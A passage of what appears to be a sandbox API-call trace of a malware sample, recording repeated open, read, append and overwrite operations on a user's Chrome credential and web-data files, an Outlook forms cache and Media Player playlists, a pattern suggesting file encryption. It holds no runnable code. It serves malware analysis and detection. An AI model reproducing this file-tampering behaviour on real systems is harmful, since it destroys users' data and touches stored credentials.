cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0152.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x1f88d34, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verified_contents.json", lpUsedDefaultChar=0x0) returned 22 [0152.328] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.330] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2e39 [0152.330] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.336] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2e39 [0152.336] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.337] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0152.337] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0152.337] CloseHandle (hObject=0x1d4) returned 1 [0152.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0152.338] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.338] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4800 [0152.339] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.339] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.339] ReleaseMutex (hMutex=0x168) returned 1 [0152.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Login Data", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0152.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Login Data", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Login Data", lpUsedDefaultChar=0x0) returned 10 [0152.339] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.341] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3800 [0152.341] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.342] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3800 [0152.342] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.343] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0152.343] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0152.343] CloseHandle (hObject=0x1d4) returned 1 [0152.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\shortcuts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0152.344] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.344] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3000 [0152.344] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.344] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.345] ReleaseMutex (hMutex=0x168) returned 1 [0152.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shortcuts", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0152.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shortcuts", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shortcuts", lpUsedDefaultChar=0x0) returned 9 [0152.345] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.346] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2000 [0152.346] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.347] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2000 [0152.347] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.348] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0152.348] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0152.348] CloseHandle (hObject=0x1d4) returned 1 [0152.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0152.349] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.349] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x11000 [0152.349] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0152.349] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.349] ReleaseMutex (hMutex=0x168) returned 1 [0152.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Data", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0152.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Data", cchWideChar=8, lpMultiByteStr=0x1f735ec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Web Data", lpUsedDefaultChar=0x0) returned 8 [0152.349] ReadFile (in: hFile=0x1d4, lpBuffer=0x286df88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286df88*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0153.438] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x10000 [0153.438] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.439] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x10000 [0153.439] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0153.439] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0153.439] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0153.440] CloseHandle (hObject=0x1d4) returned 1 [0153.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0153.442] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.442] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x8000 [0153.442] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.442] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.442] ReleaseMutex (hMutex=0x168) returned 1 [0153.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Suggested Sites~.feed-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0153.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Suggested Sites~.feed-ms", cchWideChar=24, lpMultiByteStr=0x1f8fd5c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Suggested Sites~.feed-ms", lpUsedDefaultChar=0x0) returned 24 [0153.443] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.450] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7000 [0153.451] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.452] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7000 [0153.453] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0153.453] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0153.453] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0153.454] CloseHandle (hObject=0x1d4) returned 1 [0153.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0153.456] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.457] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3c0dc [0153.457] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.457] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.457] ReleaseMutex (hMutex=0x168) returned 1 [0153.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FRMCACHE.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FRMCACHE.DAT", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FRMCACHE.DAT", lpUsedDefaultChar=0x0) returned 12 [0153.458] ReadFile (in: hFile=0x1d4, lpBuffer=0x28790b8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0153.460] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3b0dc [0153.460] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0153.461] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3b0dc [0153.462] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0153.462] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0153.462] WriteFile (in: hFile=0x1d4, lpBuffer=0x28810e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28810e8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0153.463] CloseHandle (hObject=0x1d4) returned 1 [0153.463] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0153.465] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.466] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x311 [0153.466] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.466] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.466] ReleaseMutex (hMutex=0x168) returned 1 [0153.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="06_Pictures_rated_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0153.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="06_Pictures_rated_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa53fc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="06_Pictures_rated_4_or_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0153.466] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x311, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2b1f2bc*=0x311, lpOverlapped=0x0) returned 1 [0153.469] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0153.469] WriteFile (in: hFile=0x1d4, lpBuffer=0x28790d8*, nNumberOfBytesToWrite=0x899, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x899, lpOverlapped=0x0) returned 1 [0153.472] CloseHandle (hObject=0x1d4) returned 1 [0153.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0153.486] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.486] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4ff [0153.489] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.489] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.489] ReleaseMutex (hMutex=0x168) returned 1 [0153.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="02_Music_added_in_the_last_month.wpl", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0153.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="02_Music_added_in_the_last_month.wpl", cchWideChar=36, lpMultiByteStr=0x1fa53fc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="02_Music_added_in_the_last_month.wpl", lpUsedDefaultChar=0x0) returned 36 [0153.491] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x4ff, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x2b1f2bc*=0x4ff, lpOverlapped=0x0) returned 1 [0153.499] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0153.499] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xa87, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa87, lpOverlapped=0x0) returned 1 [0153.499] CloseHandle (hObject=0x1d4) returned 1 [0153.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0153.500] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.500] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x427 [0153.501] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.501] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.501] ReleaseMutex (hMutex=0x168) returned 1 [0153.501] 